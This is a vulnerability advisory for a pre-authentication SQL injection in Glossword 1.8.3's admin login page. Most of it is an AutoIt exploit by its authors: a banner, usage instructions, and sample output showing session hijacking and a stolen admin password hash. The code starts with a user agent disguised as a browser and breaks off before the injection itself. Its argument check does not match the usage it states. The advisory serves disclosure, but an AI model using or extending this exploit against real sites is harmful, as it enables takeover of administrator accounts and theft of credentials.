Published: 2013-02-05
Updated: 2013-02-27
Affected systems:
SourceForge Glossword 1.8.3
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 57732
Glossword is a system for creating and publishing online multilingual dictionaries, glossaries, or encyclopedias.
In Glossword 1.8.3 and other versions, the gw_admin/login.php script does not properly sanitize the value of the 'arPost[user_name]' POST parameter before using it in a SQL query. Because login.php is reachable before authentication, a remote attacker can inject or manipulate SQL queries against the back-end database.
<*Source: Akastep
Link:
*>
Test method:
--------------------------------------------------------------------------------
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!
#cs
==============================================================
Vulnerable Software: Glossword 1.8.3
Official site:
Download:
Vuln: SQLi
==================THIS IS A WHOLE EXPLOIT=====================
Exploit Coded In AutoIT.
To exploit this vulnerability magic_quotes_gpc must be turned off on server side.
Print screen:
POC video:
Exploit usage:
C:\0day>glossa.exe /glossword/glossword/ 2
##############################################################
# Glossword 1.8.3 SQL injection Exploit #
# Usage: glossa.exe /installdir/ UID (int) #
# DON'T HATE THE HACKER, HATE YOUR OWN CODE! #
# VULN/Exploit: AkaStep & HERO_AZE #
##############################################################
##############################################################
[*] SENDING FAKE SESSUID: ea0f5d8c7c2c8a2f9f7c3b3e5a3d4f5d [*]
##############################################################
##############################################################
[*] CMS is GLOSSWORD! [*]
##############################################################
##############################################################
[*] FETCHING VALID SESSUID [*]
##############################################################
##############################################################
[*] Got VALID SESSUID: aa0e680bef2679932393abe72b78ef03 [*]
##############################################################
##############################################################
[*] !~ P*W*N*E*D ~! [*]
--------------------------------------------------------------
[*] Login: admin [*]
--------------------------------------------------------------
[*] Password: (MD5) 260efaff0cac0f78a53ccc540e89e72d [*]
--------------------------------------------------------------
Admin Panel: hacker1.own/glossword/glossword/gw_admin/login.php
--------------------------------------------------------------
[*] Good Luck;) [*]
##############################################################
[*] DONE [*]
##############################################################
#ce
#NoTrayIcon
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_Outfile=glossa.exe
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#include "WinHttp.au3"
#include <inet.au3>
#include <String.au3>
$triptrop=@CRLF & _StringRepeat('#',62) & @CRLF;
$exploitname=@CRLF & _StringRepeat('#',62) & @CRLF & _
'#' & _StringRepeat(' ',11) & 'Glossword 1.8.3 SQL injection Exploit ' & _StringRepeat(' ',11) & '#' & @CRLF & _
'# Usage: ' & @ScriptName & ' ' & ' /installdir/ ' & ' UID (int) #' & _
@CRLF & "# DON'T HATE THE HACKER, HATE YOUR OWN CODE! #" & @CRLF & _
'# VULN/Exploit: AkaStep & HERO_AZE #' & @CRLF & _StringRepeat('#',62);
ConsoleWrite(@CRLF & $exploitname & @CRLF)
$method='POST';
$vulnurl='gw_admin/login.php'
Global $sessid=0
$cmsindent='lossword'; # We will use it to identify CMS #;
$adminpanel=$vulnurl
;#~ Pretend we are not a bot or an exploit: we are a human using IE. #~;
$useragent='Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SV1; .NET CLR 1.1.4325)';
$msg_usage="Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName & ' ' & ' /installdir/ ' & ' UID (int)' & @CRLF
if $CmdLine[0] <> 3 Then
ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);
MsgBox(64,"",$msg_usage);
exit;
EndIf